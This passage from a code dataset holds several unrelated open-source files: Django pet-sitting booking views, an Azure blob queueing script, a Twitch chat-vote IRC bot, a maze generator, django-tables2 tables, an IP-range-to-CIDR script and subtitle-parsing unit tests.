19:\"19:00-20:00\",\n 20:\"20:00-21:00\",\n 21:\"21:00-22:00\",\n 22:\"22:00-23:00\",\n 23:\"23:00-00:00\"\n }\n\n #creating context data\n timeslot = time_to_interval_converter[booking.time_slot]\n\n context = {\n \"service\":service,\n \"booking\":booking,\n \"owner\":user,\n \"timeslot\":timeslot\n }\n\n subject = 'You have a booking with MiiPets!'\n html_message = render_to_string('services/notify_sitter_booking_email.html',\n context)\n plain_message = strip_tags(html_message)\n from_email = 'info@miipets.com'\n to = email_address\n try:\n mail.send_mail(subject, plain_message, from_email, [to], html_message=html_message)\n except mail.BadHeaderError:\n return HttpResponse('Invalid header found.')\n\n\ndef send_owner_confirmation_email(service, booking, sitter_answer):\n \"\"\"\n Send email to owner after sitter confirms\n \"\"\"\n\n time_to_interval_converter = {\n 9999:\"Whole day\",\n 1:\"01:00-02:00\",\n 2:\"02:00-02:00\",\n 3:\"03:00-04:00\",\n 4:\"04:00-05:00\",\n 5:\"05:00-06:00\",\n 6:\"06:00-07:00\",\n 7:\"07:00-08:00\",\n 8:\"08:00-09:00\",\n 9:\"09:00-10:00\",\n 10:\"10:00-11:00\",\n 11:\"11:00-12:00\",\n 12:\"12:00-13:00\",\n 13:\"13:00-14:00\",\n 14:\"14:00-15:00\",\n 15:\"15:00-16:00\",\n 16:\"16:00-17:00\",\n 17:\"17:00-18:00\",\n 18:\"18:00-19:00\",\n 19:\"19:00-20:00\",\n 20:\"20:00-21:00\",\n 21:\"21:00-22:00\",\n 22:\"22:00-23:00\",\n 23:\"23:00-00:00\"\n }\n\n #creating context data\n timeslot = time_to_interval_converter[booking.time_slot]\n\n context = {\n \"service\":service,\n \"booking\":booking,\n \"owner\":booking.requester,\n \"timeslot\":timeslot\n }\n\n if booking.sitter_answer:\n subject = 'Your MiiSitter has accepted your booking!'\n else:\n subject = 'Your MiiSitter has responded to your booking'\n\n html_message = render_to_string('services/notify_owner_booking_email.html',\n context)\n plain_message = strip_tags(html_message)\n from_email = 'info@miipets.com'\n to = booking.requester.email\n try:\n mail.send_mail(subject, plain_message, from_email, [to], html_message=html_message)\n except mail.BadHeaderError:\n return HttpResponse('Invalid header found.')\n\n\n@login_required(login_url='core-login')\ndef booking_confirmation(request, service_id, booking_id):\n\n\n booking = ServiceBooking.objects.get(id=booking_id)\n service = SitterServices.objects.get(id=service_id)\n\n # send email to sitter\n if booking.notified_sitter == False:\n try:\n send_sitter_confirmation_email(service, booking, request.user, service.sitter.email)\n print(\"SITTER NOTIFIED\")\n booking.notified_sitter = True\n booking.save(update_fields=['notified_sitter'])\n except:\n print(\"Sitter notification email did not work\")\n\n return render(request, 'services/booking_confirmation.html', {\"user\":request.user})\n\n\n@login_required(login_url='core-login')\ndef sitter_confirmation(request, service_id, booking_id, sitter_answer):\n\n booking = ServiceBooking.objects.get(id=booking_id)\n service = SitterServices.objects.get(id=service_id)\n\n sitter_answer_converter = {\n 0:False,\n 1:True\n }\n\n if booking.sitter_confirmed:\n # sitter has already answered and can not change now\n pass\n else:\n booking.sitter_confirmed = True\n booking.sitter_answer = sitter_answer_converter[sitter_answer]\n\n #send owner email notifying of sitter answer\n try:\n send_owner_confirmation_email(service,\n booking,\n sitter_answer)\n booking.notified_owner_of_sitter_response = True\n except:\n print(\"Could not send email to owner\")\n\n #update booking details\n 
booking.save(update_fields=['sitter_confirmed',\n 'sitter_answer',\n 'notified_owner_of_sitter_response'])\n\n return render(request, 'services/booking_confirmation_sitter.html', {\"user\":request.user, \"sitter_answer\":sitter_answer})\n\n@login_required(login_url='core-login')\n@agreed_terms_required\ndef view_sitter_profile(request, sitter_id):\n \"\"\"\n When a someone clicks on the service sitter\n link they will be taken to this profile page\n where there is no option to edit profile\n \"\"\"\n sitter = User.objects.get(id=sitter_id)\n miisitter = MiiSitter.objects.get(user=sitter)\n services = SitterServices.objects.filter(sitter=sitter)\n\n try:\n if request.user.is_sitter:\n context = {\n \"services\":services,\n \"sitter\":sitter,\n \"sitter_user\":True,\n \"review_html\":generate_review_html_start(miisitter.review_score),\n \"review_score\":miisitter.review_score,\n }\n else:\n context = {\n \"services\":services,\n \"sitter\":sitter,\n \"sitter_user\":False,\n \"review_html\":generate_review_html_start(miisitter.review_score),\n \"review_score\":miisitter.review_score,\n }\n except:\n context = {\n \"services\":services,\n \"sitter\":sitter,\n \"sitter_user\":False,\n \"review_html\":generate_review_html_start(miisitter.review_score),\n \"review_score\":miisitter.review_score,\n }\n\n return render(request, 'services/view_sitter_profile.html', context)\n\n@login_required(login_url='core-login')\n@agreed_terms_required\ndef view_owner_profile(request, owner_id):\n \"\"\"\n When a someone clicks on the owner\n link they will be taken to this profile page\n where there is no option to edit profile\n \"\"\"\n owner = User.objects.get(id=owner_id)\n pets = Pets.objects.filter(owner=owner)\n\n try:\n if request.user.is_sitter:\n context = {\n \"pets\":pets,\n \"owner\":owner,\n \"sitter_user\":True,\n }\n else:\n context = {\n \"pets\":pets,\n \"owner\":owner,\n \"sitter_user\":False,\n }\n except:\n context = {\n \"pets\":pets,\n \"owner\":owner,\n \"sitter_user\":False,\n }\n\n return render(request, 'services/view_owner_profile.html', context)\n\n\n@login_required(login_url='core-login')\n@agreed_terms_required\ndef owner_payment(request, service_id, booking_id):\n\n booking = ServiceBooking.objects.get(id=booking_id)\n service = SitterServices.objects.get(id=service_id)\n\n return render(request, 'services/payment_owner.html', {\"user\":request.user})\n","repo_name":"MiiPets/webapp","sub_path":"MiipetsWebApp/services/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":28748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7581360128","text":"import os\n\nimport pandas as pd\nfrom dotenv import load_dotenv\nfrom azure.storage.blob import BlobServiceClient\nimport requests\n\nload_dotenv()\n\nblob_service_client = BlobServiceClient.from_connection_string(\n os.getenv(\"AZURE_STORAGE_CONNECTION_STRING\")\n)\n\ncontainer_name = os.environ[\"CONTAINER_NAME\"]\n\n\nbatch = 500\n\n\ndef main():\n for d in pd.date_range(\"2020-09-01\", \"2020-11-30\", freq=\"D\"):\n for blob in blob_service_client.get_container_client(container_name).list_blobs(\n name_starts_with=f\"profiles/{d.strftime('%Y-%m-%d')}\"\n ):\n print(f\"sending {blob.name}\")\n res = requests.post(\n f\"http://localhost:3030/queue/newstory.tasks.newEntry\",\n json={\"message\": blob.name},\n )\n res.raise_for_status()\n\n\nif __name__ == \"__main__\":\n 
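Each view in the services app above repeats a try/except around request.user.is_sitter just to set a context flag; that check factors out cleanly. A sketch (the helper name is mine, not from views.py):

def is_sitter(request):
    # True only for requests whose user exposes is_sitter=True; missing
    # attributes (e.g. AnonymousUser) collapse to False, as in the views above.
    return bool(getattr(getattr(request, 'user', None), 'is_sitter', False))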
main()\n","repo_name":"eylonronen/newstory-scraper","sub_path":"scripts/send_to_service.py","file_name":"send_to_service.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16734217008","text":"import logging\nimport threading\nimport time\n\nimport irc.bot\n\nfrom constants import MOVEMENT_BACKWARD, MOVEMENT_FORWARD, MOVEMENT_SIT, MOVEMENT_STAND, MOVEMENT_STRAFE_LEFT, \\\n MOVEMENT_STRAFE_RIGHT, MOVEMENT_TURN_LEFT, MOVEMENT_TURN_RIGHT\n\n\nclass TwitchBot(irc.bot.SingleServerIRCBot):\n def __init__(self, username, client_id, token, channel, movement_callback):\n self.__client_id = client_id\n self.__token = token\n self.__channel = '#' + channel\n self.__chat_buffer = {}\n self.__chat_count = 0\n\n self.__movement_callback = movement_callback\n\n server = 'irc.chat.twitch.tv'\n port = 6667\n logging.info(f'Connecting to twitch-server {server} on port {port}...')\n irc.bot.SingleServerIRCBot.__init__(\n self, [(server, port, str(token))], username, username)\n\n def on_welcome(self, c, e):\n logging.info(f'Joining {self.__channel}')\n\n threading.Thread(target=self.__chat_analyzer).start()\n\n c.cap('REQ', ':twitch.tv/membership')\n c.cap('REQ', ':twitch.tv/tags')\n c.cap('REQ', ':twitch.tv/commands')\n c.join(self.__channel)\n\n def get_chat_count(self):\n return self.__chat_count\n\n def on_pubmsg(self, c, e):\n if e.arguments[0][:1] == '!':\n cmd = e.arguments[0].split(' ')[0][1:]\n self.do_command(e, cmd)\n return\n\n def do_command(self, event, cmd):\n moves = [MOVEMENT_BACKWARD, MOVEMENT_FORWARD, MOVEMENT_SIT, MOVEMENT_STAND,\n MOVEMENT_STRAFE_LEFT, MOVEMENT_STRAFE_RIGHT, MOVEMENT_TURN_LEFT, MOVEMENT_TURN_RIGHT]\n if cmd == \"help\":\n self.connection.privmsg(event.target, ' '.join(\n [str(elem) for elem in map((lambda move: f\"!{move}\"), moves)]))\n\n if cmd in moves:\n self.__chat_buffer[event.source.nick] = cmd\n\n def __chat_analyzer(self):\n while True:\n time.sleep(1)\n\n chat_buffer = self.__chat_buffer\n self.__chat_count = len(self.__chat_buffer.keys()) if len(\n self.__chat_buffer.keys()) > 0 else self.__chat_count\n self.__chat_buffer = {}\n\n count_dict = {\n MOVEMENT_SIT: 0,\n MOVEMENT_STAND: 0,\n MOVEMENT_STRAFE_LEFT: 0,\n MOVEMENT_STRAFE_RIGHT: 0,\n MOVEMENT_TURN_LEFT: 0,\n MOVEMENT_TURN_RIGHT: 0,\n MOVEMENT_BACKWARD: 0,\n MOVEMENT_FORWARD: 0\n }\n\n for value in chat_buffer.values():\n if value == MOVEMENT_SIT:\n count_dict[MOVEMENT_SIT] += 1\n elif value == MOVEMENT_STAND:\n count_dict[MOVEMENT_STAND] += 1\n elif value == MOVEMENT_STRAFE_LEFT:\n count_dict[MOVEMENT_STRAFE_LEFT] += 1\n elif value == MOVEMENT_STRAFE_RIGHT:\n count_dict[MOVEMENT_STRAFE_RIGHT] += 1\n elif value == MOVEMENT_TURN_LEFT:\n count_dict[MOVEMENT_TURN_LEFT] += 1\n elif value == MOVEMENT_TURN_RIGHT:\n count_dict[MOVEMENT_TURN_RIGHT] += 1\n elif value == MOVEMENT_BACKWARD:\n count_dict[MOVEMENT_BACKWARD] += 1\n elif value == MOVEMENT_FORWARD:\n count_dict[MOVEMENT_FORWARD] += 1\n\n top_result = sorted(\n count_dict, key=count_dict.get, reverse=True)[0]\n\n if count_dict[top_result] > 0:\n logging.info(f\"command '{top_result}' won with {count_dict[top_result]} votes\")\n self.__movement_callback(top_result)\n","repo_name":"monstrey-technologies/twitch-plays-spot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21568179286","text":"import random\nfrom 
linkedlist import cons\nfrom linkedlist import empty_list\n\n\nclass Maze:\n    def __init__(self, w, h, paths):\n        self.maze = [\n            [0 for x in range(0, w)] for y in range(0, h)]\n        for ((i, j), (i_, j_)) in paths:\n            if j == j_:  # Horizontal path\n                self.maze[j][i] |= 1  # Right\n                self.maze[j_][i_] |= 4  # Left\n            elif i == i_:  # Vertical path\n                self.maze[j][i] |= 2  # Down\n                self.maze[j_][i_] |= 8  # Up\n        self.w = w\n        self.h = h\n\n    def get_walls(self, coord):\n        (i, j) = coord\n        return self.maze[j][i]\n\n    def reachable(self, coord):\n        (i, j) = coord\n        reachable = list()\n        if self.get_walls(coord) & 1 == 1:  # Right is reachable\n            reachable.append((i + 1, j))\n        if self.get_walls(coord) & 2 == 2:  # Down is reachable\n            reachable.append((i, j + 1))\n        if self.get_walls(coord) & 4 == 4:  # Left is reachable\n            reachable.append((i - 1, j))\n        if self.get_walls(coord) & 8 == 8:  # Up is reachable\n            reachable.append((i, j - 1))\n        return reachable\n\n    def as_string(self):\n        maze, w, h = self.maze, self.w, self.h\n        lines = [\"#\" * (2 * w + 1)]\n        for i in range(0, h):\n            # Horizontal paths\n            upper = \"#\" + \"\".join([\"  \" if maze[i][j] & 1 == 1 else \" #\" for j in range(0, w)])\n            # Vertical paths\n            lower = \"#\" + \"\".join([\" #\" if maze[i][j] & 2 == 2 else \"##\" for j in range(0, w)])\n            lines.append(upper)\n            lines.append(lower)\n\n        return \"\\n\".join(lines)\n\n    def __repr__(self):\n        return self.as_string()\n\n    @staticmethod\n    def generate(w, h):\n        # row-major indexing must divide by the width, not the height,\n        # or generation breaks for non-square mazes\n        candidates = [(n % w, n // w) for n in range(0, w * h)]\n        c_groups, g_cells, paths = dict(), dict(), list()\n\n        # Group all cells. Keep both cell -> group and group -> cells in memory\n        for (i, j) in candidates:\n            c_groups[(i, j)] = j * w + i\n            g_cells[j * w + i] = {(i, j)}\n\n        while len(g_cells) > 1:\n            index = random.randint(0, len(candidates) - 1)\n            (i, j) = c = candidates[index]\n            group = c_groups[(i, j)]\n            # list possible paths from cell (i, j)\n            choices = list()\n            if i - 1 >= 0 and c_groups[(i - 1, j)] != group:\n                choices.append((i - 1, j))\n            if i + 1 < w and c_groups[(i + 1, j)] != group:\n                choices.append((i + 1, j))\n            if j - 1 >= 0 and c_groups[(i, j - 1)] != group:\n                choices.append((i, j - 1))\n            if j + 1 < h and c_groups[(i, j + 1)] != group:\n                choices.append((i, j + 1))\n\n            if len(choices) == 0:\n                candidates.pop(index)\n                continue\n\n            c_ = random.choice(choices)\n\n            # remember chosen path and merge groups\n            if c > c_:\n                paths.append((c_, c))\n            else:\n                paths.append((c, c_))\n            old_group = c_groups[c_]\n            for cell in g_cells[old_group]:\n                c_groups[cell] = group\n            g_cells[group].update(g_cells[old_group])\n            g_cells.pop(old_group)\n\n        return Maze(w, h, paths)\n\n\nclass Solver:\n    @staticmethod\n    def solve(maze, start, end):\n        print(maze)\n        paths = [cons(start, empty_list())]\n        while True:\n            current = paths.pop(0)\n            visited = None\n            if current.has_tail:\n                visited = current.tail.head\n\n            reachable = maze.reachable(current.head)\n            if reachable:\n                for step in reachable:\n                    if step == end:\n                        res = cons(step, current).to_list()\n                        res.reverse()\n                        return res\n                    if step == visited:\n                        continue\n                    paths.append(cons(step, current))\n","repo_name":"gunsten/py-maze","sub_path":"maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"20513139702","text":"import django_tables2 as tables\nfrom django_tables2.utils import A\nfrom .models import (\n    Doctor,\n    Appointment,\n    Patient,\n    Illness,\n    Staff,\n    RoomAssignment,\n    HospitalRoom,\n    
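# StaffShift backs StaffScheduleTable at the bottom of this module\n    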
StaffShift\n)\n\n\nclass DoctorTable(tables.Table):\n view = tables.LinkColumn(\n 'doctor',\n orderable=False, text='View Schedule', args=[A('pk')]\n )\n\n class Meta:\n model = Doctor\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table'}\n fields = (\n 'view',\n 'first_name',\n 'last_name',\n 'specialization',\n )\n\n\nclass StaffTable(tables.Table):\n\n view = tables.LinkColumn(\n 'staff_details',\n orderable=False,\n text='View Staff Info',\n args=[A('pk')]\n )\n remove = tables.LinkColumn(\n 'staff_member_remove',\n orderable=False,\n text='Remove Staff Member',\n args=[A('pk')]\n )\n\n class Meta:\n model = Staff\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table'}\n fields = (\n 'view',\n 'first_name',\n 'last_name',\n 'occupation',\n 'social_security_number',\n 'remove'\n )\n\n\nclass AppointmentTable(tables.Table):\n action = tables.LinkColumn(\n 'appointment_delete',\n orderable=False,\n text='cancel',\n args=[A('pk')]\n )\n\n class Meta:\n model = Appointment\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table table-striped'}\n fields = (\n 'date',\n 'start_time',\n 'end_time',\n 'patient',\n 'doctor',\n 'action',\n )\n\n\nclass PatientAppointmentTable(tables.Table):\n\n action = tables.LinkColumn('appointment_delete', orderable=False, text='cancel', args=[A('pk')])\n\n class Meta:\n model = Appointment\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table table-striped'}\n fields = (\n 'date',\n 'start_time',\n 'end_time',\n 'doctor',\n 'action'\n )\n\n\nclass PatientTable(tables.Table):\n view = tables.LinkColumn('patient', orderable=False, text='View Patient Info', args=[A('pk')])\n\n class Meta:\n model = Patient\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table'}\n fields = (\n 'view',\n 'first_name',\n 'last_name',\n 'social_security_number'\n )\n\n\nclass IllnessTable(tables.Table):\n\n update = tables.LinkColumn('patient_illness_update', orderable=False, text='Mark Resolved', args=[A('pk')])\n\n class Meta:\n model = Illness\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table'}\n fields = (\n 'doctor',\n 'illness',\n 'prescribed_medication',\n 'date_diagnosed',\n 'resolution',\n 'update'\n )\n\n\nclass HospitalRoomTable(tables.Table):\n\n action = tables.LinkColumn('mark_room_vacant', text='Mark Vacant', orderable=False, args=[A('pk')])\n\n class Meta:\n model = RoomAssignment\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table'}\n fields = (\n 'patient',\n 'room',\n 'doctor',\n 'nurse'\n )\n\n\nclass HospitalRoomsTable(tables.Table):\n\n class Meta:\n model = HospitalRoom\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table'}\n fields = (\n 'room_number',\n 'department',\n 'is_vacant'\n )\n\n\nclass StaffScheduleTable(tables.Table):\n action = tables.LinkColumn(\n 'staff_delete_shift', text='cancel shift', orderable=False, args=[A('pk')]\n )\n class Meta:\n model = StaffShift\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table'}\n fields = (\n 'staff_member',\n 'staff_member.occupation',\n 'staff_member.specialization',\n 'date',\n 'start_time',\n 'end_time'\n )\n\n\n\n\n\n","repo_name":"johnhoman/hospital_db_django_project","sub_path":"management/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":4247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7352263658","text":"# script to convert IP ranges to CIDR notation\n# 
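expects a csv with a start and an end IPv4 address on each row\n# 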
version 1.0\n# Author Bert de Jong\nimport ipaddress\nimport csv\n\n# Read the csv file, set the delimiter and assign the values of each row to\n# startip and endip. Writes the resulting networks to a file, and reports\n# malformed rows on stdout.\nfile = input('Please input a filename: \\n')\ndelim = input('Please enter the delimiter used in the csv file: \\n')\n\nwith open(file, 'r') as csvfile, open('parse_ips.txt', 'w') as parsed:\n    counter = 0\n    errorcount = 0\n    rows = csv.reader(csvfile, delimiter=delim)  # renamed from range to avoid shadowing the builtin\n    for row in rows:\n        try:\n            ip1 = row[0]\n            startip = ipaddress.IPv4Address(ip1)\n            ip2 = row[1]\n            endip = ipaddress.IPv4Address(ip2)\n            cidr = [ipaddr for ipaddr in\n                    ipaddress.summarize_address_range(startip, endip)]\n            for network in cidr:\n                parsed.write(str(network))\n                parsed.write('\\n')\n                counter += 1  # count every network written, matching the final message\n        except ValueError:\n            print('There was an error with this row:', row)\n            errorcount += 1\nprint('Finished! File contains ' + str(counter) + ' networks.')\nprint('Encountered ' + str(errorcount) + ' errors. Please check standard '\n      'output for errors.')\n","repo_name":"boopboop42/IPconversionTools","sub_path":"IPrange2CIDR.py","file_name":"IPrange2CIDR.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"23801718505","text":"from lxml import etree\nfrom unittest import TestCase\n\nfrom babelsubs import storage\nfrom babelsubs.generators.html import HTMLGenerator\nfrom babelsubs.generators.srt import SRTGenerator\nfrom babelsubs.parsers import SubtitleParserError\nfrom babelsubs.tests import utils\nfrom babelsubs import utils as main_utils\n\nclass TimeHandlingTest(TestCase):\n\n    def test_split(self):\n        # should look like 1h:10:20:200\n        milliseconds = (((1 * 3600 ) + (10 * 60 ) + (20 )) * 1000 ) + 200\n        components = main_utils.milliseconds_to_time_clock_components(milliseconds)\n        self.assertEquals(dict(hours=1,minutes=10, seconds=20, milliseconds=200), components)\n    \n    def test_rounding(self):\n        milliseconds = (((1 * 3600 ) + (10 * 60 ) + (20 )) * 1000 ) + 200.40\n        components = main_utils.milliseconds_to_time_clock_components(milliseconds)\n        self.assertEquals(dict(hours=1, minutes=10, seconds=20, milliseconds=200), components)\n\n    def test_none(self):\n        self.assertEquals(dict(hours=0,minutes=0, seconds=0, milliseconds=0), main_utils.milliseconds_to_time_clock_components(0))\n\n\n    def test_expression(self):\n        # should look like 1h:10:20:200\n        milliseconds = (((1 * 3600 ) + (10 * 60 ) + (20 )) * 1000 ) + 200\n        self.assertEquals(\"01:10:20.200\", storage.milliseconds_to_time_clock_exp(milliseconds))\n\n\n    def test_time_expression_to_milliseconds_clock_time_fraction(self):\n        milliseconds = (((3 * 3600 ) + (20 * 60 ) + (40 )) * 1000 ) + 200\n        self.assertEquals(storage.time_expression_to_milliseconds(\"03:20:40.200\"), milliseconds)\n    \n    def test_parse_time_expression_clock_time(self):\n        milliseconds = (((3 * 3600 ) + (20 * 60 ) + (40 )) * 1000 ) \n        self.assertEquals(storage.time_expression_to_milliseconds(\"03:20:40\"), milliseconds)\n\n\n    def test_parse_time_expression_metric(self):\n        self.assertEquals(storage.time_expression_to_milliseconds(\"10h\"), 10 * 3600 * 1000)\n        self.assertEquals(storage.time_expression_to_milliseconds(\"5m\"), 5 * 60 * 1000)\n        self.assertEquals(storage.time_expression_to_milliseconds(\"3000s\"), 3000 * 1000)\n        self.assertEquals(storage.time_expression_to_milliseconds(\"5000ms\"), 5000)\n    \n\n    def test_parse_time_expression_clock_regex(self):\n        def 
_components(expression, hours, minutes, seconds, fraction):\n match = storage.TIME_EXPRESSION_CLOCK_TIME.match(expression)\n self.assertTrue(match)\n self.assertEquals(int(match.groupdict()['hours']), hours)\n self.assertEquals(int(match.groupdict()['minutes']), minutes)\n self.assertEquals(int(match.groupdict()['seconds']), seconds)\n try:\n self.assertEquals(int(match.groupdict()['fraction']), fraction)\n except (ValueError, TypeError):\n self.assertEquals(fraction, None)\n\n\n _components(\"00:03:02\", 0, 3, 2, None)\n _components(\"100:03:02\", 100, 3, 2, None)\n _components(\"100:03:02.200\", 100, 3, 2, 200)\n\n\n def test_normalize_time(self):\n content_str = open(utils.get_data_file_path(\"normalize-time.dfxp\") ).read()\n dfxp = storage.SubtitleSet('en', content_str, normalize_time=True)\n subs = dfxp.get_subtitles()\n self.assertTrue(len(dfxp) )\n for el in subs:\n self.assertIn(\"begin\", el.attrib)\n self.assertTrue(storage.TIME_EXPRESSION_CLOCK_TIME.match(el.attrib['begin']))\n self.assertIn(\"end\", el.attrib)\n self.assertTrue(storage.TIME_EXPRESSION_CLOCK_TIME.match(el.attrib['end']))\n self.assertNotIn('dur', el.attrib)\n self.assertEqual(subs[5].attrib['end'], '00:01:05.540')\n\nclass AddSubtitlesTest(TestCase):\n\n def _paragraphs_in_div(self, el):\n return [x for x in el.getchildren() if x.tag.endswith(\"}p\")]\n \n def test_new_paragraph(self):\n dfxp = storage.SubtitleSet('en')\n # first sub is always a paragraph break ;)\n dfxp.append_subtitle(0, 1000, \"paragraph 1 - A\")\n dfxp.append_subtitle(1000, 2000, \"paragraph 1 - B\")\n dfxp.append_subtitle(2000, 3000, \"paragraph 2 - A\", new_paragraph=True)\n dfxp.append_subtitle(3000, 4000, \"paragraph 2 - B\", new_paragraph=False)\n dfxp.append_subtitle(3000, 4000, \"paragraph 2 - C\")\n divs = dfxp._ttml.xpath('/n:tt/n:body/n:div', namespaces={'n': storage.TTML_NAMESPACE_URI})\n self.assertEquals(len(divs), 2)\n self.assertEquals(len(self._paragraphs_in_div(divs[0])), 2)\n self.assertEquals(len(self._paragraphs_in_div(divs[1])), 3)\n sub_lines = dfxp.subtitle_items()\n\n # make sure subtitle items returns the right metadata\n self.assertTrue(sub_lines[0].meta['new_paragraph'])\n self.assertFalse(sub_lines[1].meta['new_paragraph'])\n self.assertTrue(sub_lines[2].meta['new_paragraph'])\n self.assertFalse(sub_lines[3].meta['new_paragraph'])\n\n def test_no_timing(self):\n dfxp = storage.SubtitleSet('en')\n dfxp.append_subtitle(0, 1000, \"paragraph 1 - A\")\n dfxp.append_subtitle(2000, None, \"paragraph 1 - B\")\n dfxp.append_subtitle(None, None, \"paragraph 1 - C\")\n items = [x for x in dfxp.subtitle_items()]\n self.assertEquals(len(items), 3)\n self.assertEquals(items[0][0], 0)\n self.assertEquals(items[0][1], 1000)\n self.assertEquals(items[1][0], 2000)\n self.assertEquals(items[1][1], None)\n self.assertEquals(items[2][0], None)\n self.assertEquals(items[2][1], None)\n self.assertFalse(dfxp.fully_synced)\n dfxp = storage.SubtitleSet('en')\n dfxp.append_subtitle(0, 1000, \"paragraph 1 - A\")\n dfxp.append_subtitle(1000, 2000, \"paragraph 1 - B\")\n dfxp.append_subtitle(2000, 3000, \"paragraph 2 - A\", new_paragraph=True)\n dfxp.append_subtitle(3000, 4000, \"paragraph 2 - B\")\n dfxp.append_subtitle(3000, 4000, \"paragraph 2 - C\")\n self.assertTrue(dfxp.fully_synced)\n\n \n\n def test_escaping(self):\n dfxp = storage.SubtitleSet('en')\n dfxp.append_subtitle(0, 1000, \"Hey html anchor\", escape=False)\n dfxp.append_subtitle(0, 1000, \"Hey html anchor\", escape=True)\n self.assertEqual( 
storage.get_contents(dfxp.get_subtitles()[0]), 'Hey html anchor')\n self.assertEqual( storage.get_contents(dfxp.get_subtitles()[1]), 'Hey html anchor')\n \n def test_escaping_list(self):\n subtitles = ((0, 1000, \"Hey html anchor\", ),)\n dfxp = storage.SubtitleSet.from_list('en', subtitles)\n self.assertEqual( storage.get_contents(dfxp.get_subtitles()[0]), 'Hey html anchor')\n\n dfxp = storage.SubtitleSet.from_list('en', subtitles, escape=True)\n self.assertEqual( storage.get_contents(dfxp.get_subtitles()[0]), 'Hey html anchor')\n\n def test_paragraph_from_list(self):\n subs = []\n for x in xrange(0,10):\n subs.append((x * 1000, x*1000 + 999, \"Sub %x\" % x , {'new_paragraph': x%2 == 0}))\n\n dfxp = storage.SubtitleSet.from_list('en', subs)\n self.assertEqual(len(dfxp.get_subtitles()), 10)\n self.assertEqual(len(dfxp.subtitle_items()), 10)\n for i,sub in enumerate(dfxp.subtitle_items()):\n self.assertEqual(sub.meta['new_paragraph'] , i % 2 ==0)\n\n def test_control_chars_from_list(self):\n subs = [\n # normal sub\n (1000, 1100, \"Sub 1\", {'new_paragraph': True}),\n # sub with an invalid control char\n (2000, 2100, \"Sub 2\\x15\", {'new_paragraph': False}),\n ]\n dfxp = storage.SubtitleSet.from_list('en', subs)\n subtitle_items = dfxp.subtitle_items()\n self.assertEquals(subtitle_items[0].text, u'Sub 1')\n self.assertEquals(subtitle_items[1].text, u'Sub 2')\n\n def test_nested_tags(self):\n dfxp = utils.get_subs(\"simple.dfxp\").to_internal()\n self.assertEqual( storage.get_contents(dfxp.get_subtitles()[37]), 'nested spans')\n self.assertEqual( storage.get_contents(dfxp.get_subtitles()[38]), 'a word on nested spans')\n\n def test_nested_with_markup(self):\n dfxp = utils.get_subs(\"simple.dfxp\").to_internal()\n self.assertEqual( dfxp.get_content_with_markup(dfxp.get_subtitles()[38],\n dict(linebreaks=\"\\r\\n\", bold=\"%s\",\n italics=\"%s\", underline=\"%s\")),\n 'a word on nested spans')\n\n def test_region(self):\n subs = storage.SubtitleSet('en')\n subs.append_subtitle(0, 1000, \"test\", region=\"top\")\n elt = subs.get_subtitles()[0]\n self.assertEqual(elt.attrib['region'], 'top')\n\nclass AccessTest(TestCase):\n\n def test_indexing(self):\n subs = [\n (0, 1000, 'Hi'),\n (2000, 3000, 'How are you?'),\n ]\n ss = storage.SubtitleSet.from_list('en', subs)\n # make sure that from_list ends up with a usable list\n self.assertIsNotNone(ss[0])\n self.assertIsNotNone(ss[1])\n\nclass ParsingTest(TestCase):\n\n def test_f_dfxp(self):\n # tests a pretty feature rich dfpx file\n self.assertRaises(SubtitleParserError, utils.get_subs, \"from-n.dfxp\")\n\n\n\n def test_unsynced_as_generated_from_frontend(self):\n dfxp = utils.get_subs(\"dfxp-as-front-end-no-sync.dfxp\").to_internal()\n for sub in dfxp.subtitle_items():\n self.assertEqual(None, sub.start_time)\n self.assertEqual(None, sub.end_time)\n\n def test_comments(self):\n # test that the subtitle_items() method doesn't throw an exception\n # when there are comments in the DFXP. 
See gh-841 for details.\n dfxp = utils.get_subs(\"comments.dfxp\").to_internal()\n list(dfxp.subtitle_items())\n list(dfxp.subtitle_items(mappings=HTMLGenerator.MAPPINGS))\n\nclass UpdateTest(TestCase):\n\n def test_update_start_time(self):\n dfxp = utils.get_subs(\"pre-dmr.dfxp\").to_internal()\n dfxp_updated = utils.get_subs(\"pre-dmr.dfxp\").to_internal()\n for i in xrange(0, len(dfxp)):\n dfxp_updated.update(i, from_ms=1000*i)\n for i,sub in enumerate(dfxp_updated.subtitle_items()):\n self.assertEqual(i * 1000, sub.start_time)\n\n\n def test_update_end_time(self):\n dfxp = utils.get_subs(\"pre-dmr.dfxp\").to_internal()\n dfxp_updated = utils.get_subs(\"pre-dmr.dfxp\").to_internal()\n for i in xrange(0, len(dfxp)):\n dfxp_updated.update(i, to_ms=1000*i)\n for i,sub in enumerate(dfxp_updated.subtitle_items()):\n self.assertEqual(i * 1000, sub.end_time)\n\n def test_update_language_code(self):\n subs = utils.get_subs(\"simple.dfxp\").to_internal()\n subs.set_language('fr')\n lang_attr_name = '{http://www.w3.org/XML/1998/namespace}lang'\n self.assertEquals(subs._ttml.get(lang_attr_name), 'fr')\n\nclass SubtitleXMLFormattingTest(TestCase):\n def setUp(self):\n ttml = etree.fromstring('
